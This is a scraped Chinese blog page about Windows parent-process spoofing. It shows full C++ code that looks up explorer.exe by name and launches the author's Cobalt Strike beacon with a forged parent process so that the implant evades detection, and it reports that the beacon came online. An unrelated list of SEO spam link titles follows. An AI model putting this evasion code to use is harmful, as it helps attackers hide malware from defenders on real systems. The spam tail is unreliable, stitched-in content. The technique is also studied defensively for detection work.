当前位置: 首页 > news >正文

谷歌浏览器在线入口北京网站关键词优化推荐

谷歌浏览器在线入口,北京网站关键词优化推荐,网站开发侵权,网站页面怎样做1920首先我发现用calc来做进程隐藏实验是失败的#xff0c;父进程一直都是svhost.exe 那么我用我自己生成的cs木马beacon903.exe试试 试试explorer.exe 再试试cmd.exe 可以看到成功变成cmd.exe 可以看到我们可以通过这种方式虚假父进程 以上我们是直接获得的pid#xff0c;那… 首先我发现用calc来做进程隐藏实验是失败的父进程一直都是svhost.exe 那么我用我自己生成的cs木马beacon903.exe试试 试试explorer.exe 再试试cmd.exe 可以看到成功变成cmd.exe 可以看到我们可以通过这种方式虚假父进程 以上我们是直接获得的pid那么我们将他修改成通过进程名去获得对应pid 可以看到成功上线 给出全部代码 #include Windows.h #include intrin.h #include stdio.h #include iostream #include tchar.h#include TlHelp32.hDWORD GetProcessIDFromName(LPCWSTR name) {PROCESSENTRY32 pe32;pe32.dwSize sizeof(pe32);HANDLE hProcessSnap CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hProcessSnap INVALID_HANDLE_VALUE) {printf(CreateToolhelp32Snapshot Error!);return false;}BOOL bResult Process32First(hProcessSnap, pe32);int num(0);while (bResult){if (_wcsicmp(pe32.szExeFile, name) 0){return pe32.th32ProcessID;}bResult Process32Next(hProcessSnap, pe32);}CloseHandle(hProcessSnap);return 0;}int _tmain(int argc, _TCHAR* argv[]) {//CHAR* lpExePath (CHAR *)c:\\windows\\system32\\calc.exe;CHAR* lpExePath (CHAR*)C:\\Users\\qiezi\\Desktop\\beacon903.exe;LPCWSTR targetProcessName Lexplorer.exe;/* 根据进程名获取任意进程Id */DWORD pid GetProcessIDFromName(targetProcessName);//遍历进程快照获取进程ID targetProcessName//DWORD pid 17756;if (pid 0){printf(Cant find process pid!\n);return false;}HANDLE handle OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);/* 创建启动信息结构体 */STARTUPINFOEXA si;/* 初始化结构体 */ZeroMemory(si, sizeof(si));/* 设置结构体成员 */si.StartupInfo.cb sizeof(si);SIZE_T lpsize 0;/* 用微软规定的特定的函数初始化结构体 */InitializeProcThreadAttributeList(NULL, 1, 0, lpsize);/* 转换指针到正确类型 */char* temp new char[lpsize];LPPROC_THREAD_ATTRIBUTE_LIST AttributeList (LPPROC_THREAD_ATTRIBUTE_LIST)temp;/* 真正为结构体初始化属性参数 */InitializeProcThreadAttributeList(AttributeList, 1, 0, lpsize);/* 用已构造的属性结构体更新属性表 */if (!UpdateProcThreadAttribute(AttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, handle, sizeof(HANDLE), NULL, NULL)){printf(%s, Fail to update attributes);return 0;}si.lpAttributeList AttributeList;PROCESS_INFORMATION pi;ZeroMemory(pi, sizeof(pi));CreateProcessAsUserA(NULL, 0, lpExePath, 0, 0, 0, EXTENDED_STARTUPINFO_PRESENT, 0, 0, (LPSTARTUPINFOA)si, pi);DeleteProcThreadAttributeList(AttributeList);delete temp;return 0; } 代码主要实现部分为上面红框内伪造父进程最重要的一个 api 就是 InitializeProcThreadAttributeList另外还有个重要的结构体 STARTUPINFOEXA 参考文章 父进程伪造细节——https://www.wangan.com/p/7fygfy13b72f6be2
http://www.pierceye.com/news/219329/

相关文章:

  • 兰州网站建站2024免费网站推广
  • 深圳模板建站企业网站出现搜索
  • app开发网站模板该网站正在紧急升级维护中
  • 公众号编辑器365保定seo推广
  • 陕西整站关键词自然排名优化外贸获客渠道有哪些
  • 网站策划需要具备什么福州高端建站
  • 域名注册没有网站美食网页设计素材图片
  • wordpress网站在哪里修改密码ps做网站要求高吗
  • 企业网站带商城源码Audiology wordpress
  • 星月教你做网站东营城乡建设局官网
  • 镇江网站建设开发旺店通erp系统
  • 体育直播网站建设深圳制作小程序
  • 手机微信管理系统搜索引擎优化的流程是什么
  • 壁纸公司网站源码做网站价格表
  • 潜江网站设计商务科技网站建设
  • 合肥企业网站制作网站开发公司简介
  • 德州市建设小学网站文员工作内容
  • 网站域名买卖营销技巧第三季在线观看
  • 西宁市公司网站建设比较网站建设
  • 深圳网站设计公司建设部人才网站
  • 广水住房和城乡建设部网站巅峰网站建设
  • 建设智能家居网站SWOT分析商业网站有哪些
  • 相亲网站男人拉我做外汇h5特效网站欣赏
  • 网站一个多少钱有什么做同城的网站
  • 网站 改版 方案wordpress谷歌字体 4.9
  • 全网引流推广 价格网站百度关键词seo排名优化
  • 信用门户网站建设规范win7 iis 发布asp.net网站
  • 织梦网站添加视频教程如何套用wordpress的源码
  • 网站服务器模式wordpress安装后只有英文版
  • 企业网站建设晋升wordpress 自助建站